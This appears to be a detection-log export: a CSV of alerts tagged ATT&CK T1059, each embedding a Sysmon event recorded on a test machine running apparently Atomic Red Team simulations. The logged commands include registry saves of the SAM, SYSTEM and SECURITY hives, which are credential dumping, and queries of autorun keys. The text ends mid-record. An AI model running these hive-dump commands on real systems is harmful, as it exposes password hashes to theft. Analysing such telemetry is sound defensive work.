[T1059] Command-Line Interface,1563547791.99625,2019-07-19T18:49:51.996250+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:49:43.569071Z"">
</TimeCreated>
<EventRecordID>3723</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:49:43.520</Data>
<Data Name=""ProcessGuid"">747F3D96-D887-5D31-0000-0010D51F3200</Data>
<Data Name=""ProcessId"">752</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547781.691049,2019-07-19T18:49:41.691049+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg save HKLM\SAM sam.hive&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:49:41.660271Z"">
</TimeCreated>
<EventRecordID>3721</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:49:41.646</Data>
<Data Name=""ProcessGuid"">747F3D96-D885-5D31-0000-00107F1A3200</Data>
<Data Name=""ProcessId"">2832</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg save HKLM\SAM sam.hive&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547779.255338,2019-07-19T18:49:39.255338+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg save HKLM\System system.hive&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:49:39.229170Z"">
</TimeCreated>
<EventRecordID>3719</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:49:39.214</Data>
<Data Name=""ProcessGuid"">747F3D96-D883-5D31-0000-0010839B3100</Data>
<Data Name=""ProcessId"">3904</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg save HKLM\System system.hive&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547773.63255,2019-07-19T18:49:33.632550+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg save HKLM\Security security.hive&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:49:33.619257Z"">
</TimeCreated>
<EventRecordID>3717</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:49:33.603</Data>
<Data Name=""ProcessGuid"">747F3D96-D87D-5D31-0000-0010958F3100</Data>
<Data Name=""ProcessId"">1728</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg save HKLM\Security security.hive&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547773.572021,2019-07-19T18:49:33.572021+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:49:33.559318Z"">
</TimeCreated>
<EventRecordID>3715</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:49:33.541</Data>
<Data Name=""ProcessGuid"">747F3D96-D87D-5D31-0000-0010FA8A3100</Data>
<Data Name=""ProcessId"">3868</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547773.392501,2019-07-19T18:49:33.392501+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:49:33.375717Z"">
</TimeCreated>
<EventRecordID>3713</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:49:33.365</Data>
<Data Name=""ProcessGuid"">747F3D96-D87D-5D31-0000-0010CA843100</Data>
<Data Name=""ProcessId"">3900</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547773.331942,2019-07-19T18:49:33.331942+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:49:33.303358Z"">
</TimeCreated>
<EventRecordID>3711</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:49:33.284</Data>
<Data Name=""ProcessGuid"">747F3D96-D87D-5D31-0000-00103B803100</Data>
<Data Name=""ProcessId"">324</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547773.251689,2019-07-19T18:49:33.251689+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:49:33.225776Z"">
</TimeCreated>
<EventRecordID>3709</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:49:33.209</Data>
<Data Name=""ProcessGuid"">747F3D96-D87D-5D31-0000-0010B37B3100</Data>
<Data Name=""ProcessId"">3616</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547773.175813,2019-07-19T18:49:33.175813+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:49:33.147861Z"">
</TimeCreated>
<EventRecordID>3707</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:49:33.113</Data>
<Data Name=""ProcessGuid"">747F3D96-D87D-5D31-0000-00102B773100</Data>
<Data Name=""ProcessId"">2148</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547773.059631,2019-07-19T18:49:33.059631+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:49:33.036329Z"">
</TimeCreated>
<EventRecordID>3705</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:49:33.019</Data>
<Data Name=""ProcessGuid"">747F3D96-D87D-5D31-0000-001090723100</Data>
<Data Name=""ProcessId"">196</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547772.990533,2019-07-19T18:49:32.990533+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:49:32.975133Z"">
</TimeCreated>
<EventRecordID>3703</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:49:32.956</Data>
<Data Name=""ProcessGuid"">747F3D96-D87C-5D31-0000-0010056E3100</Data>
<Data Name=""ProcessId"">4220</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
